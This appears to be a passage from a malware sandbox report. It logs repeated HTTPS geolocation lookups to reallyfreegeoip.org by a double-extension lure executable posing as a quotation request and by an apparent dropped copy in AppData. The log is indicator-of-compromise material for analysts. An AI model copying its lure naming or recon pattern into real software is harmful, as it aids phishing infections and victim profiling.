2024-11-21 11:20:14 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:14 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151923 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QBNxVIJTLaWDCTbu0sZ%2BU0K3hU1KsTdYPFZ%2Fkv48XuLikluYPffiGw5HK9sdlJwzTt7I73xeoMDEi1rl32fN%2FGFYQV8OTlMkTL6afkI9PAl7bF8ONykG4m5nO%2Fvvrq8DJg04fDG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a135e2dc402-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1750599&cwnd=177&unsent_bytes=0&cid=463b771eed5e0d57&ts=464&x=0"
2024-11-21 11:20:14 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49734	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:16 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:16 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151925 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZASHS1r3hyfDhgK2%2BiYzTVlHE22DaJWnXqrDK98KWNYSwX519zW7Gs%2B2kVMj1j4KnEEbzvf8gDQCzdanraNkJzpJ1x1H14fKX6XQ0x%2B6YwnJw%2BAYHLCjCL1xqawLXLEcpxyahosF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a20cafb4387-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1763285&cwnd=191&unsent_bytes=0&cid=945768affa97641a&ts=461&x=0"
2024-11-21 11:20:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49742	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:19 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:20 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151928 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRcVpEjRgiO%2FhXnuhtrznKZUsG95U6OXQX0LknNUu1aUemReX%2Bpt%2BmPvP9IE%2BH1LMoUaJ9VlkEvyWasAP5HgeE5CfFcaWDO2U8TR%2BzvJcU7psL9dTuTCSzpmjKXWaVc%2FuE3%2Fx2RS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a333f4f42ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2085&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1354359&cwnd=193&unsent_bytes=0&cid=79b0dc616919f1a0&ts=584&x=0"
2024-11-21 11:20:20 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49748	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:19 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:20 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:20 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151929 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7N38IJJJNLgoU1khQChEbqOuqnVg%2F9iS5QKXz94aKPi%2BWBoyoJUQ3%2FwszMJap5BKHTf9QyeVJ7vfGuxGlrZZYZhrer3%2BmZWGCQS3g%2B5rs5OrFKhlkwDkakdj6vabsvaD5LQ3Lxu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a3529bd334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1463659&cwnd=173&unsent_bytes=0&cid=6c427286a2b27797&ts=477&x=0"
2024-11-21 11:20:20 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49751	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:21 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:22 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:21 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151930 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EMjrAAkEkqZNaUOIlZAkT6cCehLnNUZk2Q1k8jGgg9G%2FSJ9oOjyTK3uajlc8n%2B8Z%2BK7wWdtaUioPJ2Uiu8e6qxhg%2FR%2Brjhr%2Bk7z3qLylhHu3vPgAQaT%2FBRfHKvYojFIsdWC66PGr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a413b924201-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1651583&cwnd=219&unsent_bytes=0&cid=f49d718c0c9eb0f9&ts=461&x=0"
2024-11-21 11:20:22 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49756	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:22 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:23 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:23 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151932 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FJznd4GmAj1NM8clbD7DMPMKHqi55NB8o7g6lNhusi3J3bhoeemfEjnaczEGxIueA10dSRBHyAQEj%2BnND5cIJjDLyXJVpku3X9x7RPnw72354TbXiWh6liUTM%2BG8O9Mo4LFxGws"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a48fa1842fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1864623&cwnd=247&unsent_bytes=0&cid=dea8a7088951cb31&ts=474&x=0"
2024-11-21 11:20:23 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49764	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:24 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:25 UTC	849	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:25 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151934 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfvM6G0PuCXrILp2MxM%2BXzBOHKsm9f1tFCFmaN6Zbyk7IZGspWSEWq%2FpJWxbQwrbEUXKfRXujlGVrzZjG3vCTNZyfiK72ltl66YqDUN7hwkLj82q4MhSpmGTlT6Z3p63Q3MTQZh0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a555f704367-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2342&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1189894&cwnd=235&unsent_bytes=0&cid=a7c633bdfd75ec3f&ts=471&x=0"
2024-11-21 11:20:25 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49767	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:26 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:26 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:26 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151935 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZVazgdu8QvYb0C4jxCyTqpN3B0zb4HXmqciN3LPpmVft%2BaJ2QgyK%2BTJPaHh0T2xNipGlAjrzPtdEukcosL8wr%2FO1pVeCWv28UHT2Fw2nDQHFXEV4P6VVR%2B5IO0hNgNp%2BAzL%2BZ6G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a5d5a8719bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1461461&cwnd=209&unsent_bytes=0&cid=1f01311cc8d4cf90&ts=469&x=0"
2024-11-21 11:20:26 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49775	188.114.97.3	443	7636	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:28 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 11:20:28 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:28 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151937 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DR%2F7guaa4HD6fIR5gYxDG4DHQvd9Y%2B1S7gpcEd0Lx7CdO4%2Fj49zL4xo3GlP2cbp2%2FE8RQ5TFGgL%2BROa45mNEtNlPQToqMX%2BHhHWWoLRheOnCsWdgCy4nQgaDep5omlbuQhcZbeze"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a6928dade96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2164&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1286910&cwnd=228&unsent_bytes=0&cid=bcad66b7b79a2f60&ts=464&x=0"
2024-11-21 11:20:28 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49781	188.114.97.3	443	7264	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 11:20:29 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 11:20:29 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 11:20:29 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 151938 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=45%2FxvjXRI7L3Xytn8Wj0buWWrjPz0QO%2FvHLMyXDesGLXHHFdUxRH4EhhwesJq6MMyYCNimghdIUFkC05HOrW92ezxticMCOB0HK5qRBTKjYxcohKAv04%2FGc%2Fc%2Bg06ExmX4oTRJX9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e604a713ff94340-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1639&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1778319&cwnd=199&unsent_bytes=0&cid=d540bb3e071acc65&ts=461&x=0"
2024-11-21 11:20:29 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New 